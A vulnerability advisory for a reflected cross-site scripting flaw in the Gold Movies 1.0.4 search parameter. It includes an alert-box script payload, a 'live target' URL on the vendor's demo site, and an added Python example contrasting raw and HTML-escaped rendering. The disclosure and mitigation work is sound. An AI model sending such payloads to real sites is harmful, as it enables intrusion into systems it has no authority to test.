Gold Movies 1.0.4 Cross Site Scripting

2019-01-01T00:00:00
ID PACKETSTORM:150970
Type packetstorm
Reporter Deyaa Muhammad
Modified 2019-01-01T00:00:00

Description

# Exploit Title: Gold Movies 1.0.4 - Cross-Site Scripting
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://codecanyon.net/user/themesgold
# Software Link: https://codecanyon.net/item/gold-movies/11371340
# Demo Website: http://themes-gold.com/movies/
# Version: 1.0.4
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
An XSS vulnerability was found in the search section of "Gold Movies 1.0.4".

# POC Request:
http://[PATH]/search?q="><script>alert('Deyaa')</script>

# Live Target:
http://themes-gold.com/movies/search?q="><script>alert('Deyaa')</script>
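
# Mitigation example (added):
The `">` prefix in the POC request suggests the `q` value is echoed inside a quoted HTML attribute. The following is an added example, not code from the advisory or from Gold Movies: the template, the function names and the `app.example` host are assumptions. It shows the same query creating script elements when echoed raw and remaining inert data once HTML-encoded on output.

```python
# Added example: hypothetical search template, not Gold Movies' actual code.
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Request from the advisory's PoC, with a placeholder host (constructed).
POC_URL = "http://app.example/search?q=\"><script>alert('Deyaa')</script>"


def query_from_url(url):
    """Return the decoded `q` parameter, as a web framework would hand it over."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(q):
    # Assumed bug pattern: the raw value is echoed into an attribute and the body.
    return f'<input name="q" value="{q}"><p>Results for {q}</p>'


def render_hardened(q):
    # escape(quote=True) encodes & < > " ' so the value cannot close the
    # attribute or open a new tag in either position.
    safe = escape(q, quote=True)
    return f'<input name="q" value="{safe}"><p>Results for {safe}</p>'


class TagAudit(HTMLParser):
    """Collects element names and the reflected value attribute."""

    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.values += [v for k, v in attrs if k == "value"]


def audit(html_doc):
    """Parse rendered HTML and return (element names, value attributes)."""
    parser = TagAudit()
    parser.feed(html_doc)
    parser.close()
    return parser.tags, parser.values


if __name__ == "__main__":
    q = query_from_url(POC_URL)
    for render in (render_vulnerable, render_hardened):
        print(render.__name__, audit(render(q)))
```

The same parser-based check can serve as a regression test on the search page: the only elements in the response should be the ones the template itself emits.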